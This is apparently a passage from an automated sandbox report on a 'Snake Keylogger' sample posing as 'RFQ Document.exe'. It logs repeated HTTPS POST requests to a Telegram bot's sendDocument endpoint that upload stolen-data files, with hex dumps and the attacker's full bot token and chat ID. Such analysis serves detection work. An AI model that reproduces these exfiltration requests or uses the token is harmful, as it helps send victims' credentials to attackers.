{"ok":true,"result":{"message_id":12819,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
233	192.168.2.4	50054	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:35 UTC	370	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ee391976 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:35 UTC	370	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 33 39 31 39 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ee391976Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:35 UTC	371	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:35 UTC	371	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12820,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
234	192.168.2.4	50055	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:35 UTC	372	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ee4ea61c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:35 UTC	372	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 34 65 61 36 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ee4ea61cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:35 UTC	372	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:35 UTC	373	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12821,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
235	192.168.2.4	50056	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:35 UTC	373	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ee6d8d55 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:35 UTC	374	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 36 64 38 64 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ee6d8d55Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:35 UTC	374	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:35 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:35 UTC	374	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12822,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
236	192.168.2.4	50057	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:35 UTC	375	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ee8c8b87 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:35 UTC	375	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 38 63 38 62 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ee8c8b87Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:35 UTC	376	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:35 UTC	376	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12823,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
237	192.168.2.4	50058	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:35 UTC	377	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eea46375 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:35 UTC	377	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 61 34 36 33 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eea46375Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:36 UTC	377	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:35 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:36 UTC	378	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12824,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808775,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
238	192.168.2.4	50059	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:36 UTC	378	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eec0fef0 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:36 UTC	378	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 63 30 66 65 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eec0fef0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:36 UTC	379	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:36 UTC	379	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12825,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808776,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
239	192.168.2.4	50060	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:36 UTC	380	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eee725a5 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:36 UTC	380	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 65 37 32 35 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eee725a5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:36 UTC	380	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:36 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:36 UTC	381	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12826,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808776,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49798	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:25 UTC	38	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c4bb9991 Host: api.telegram.org Content-Length: 407
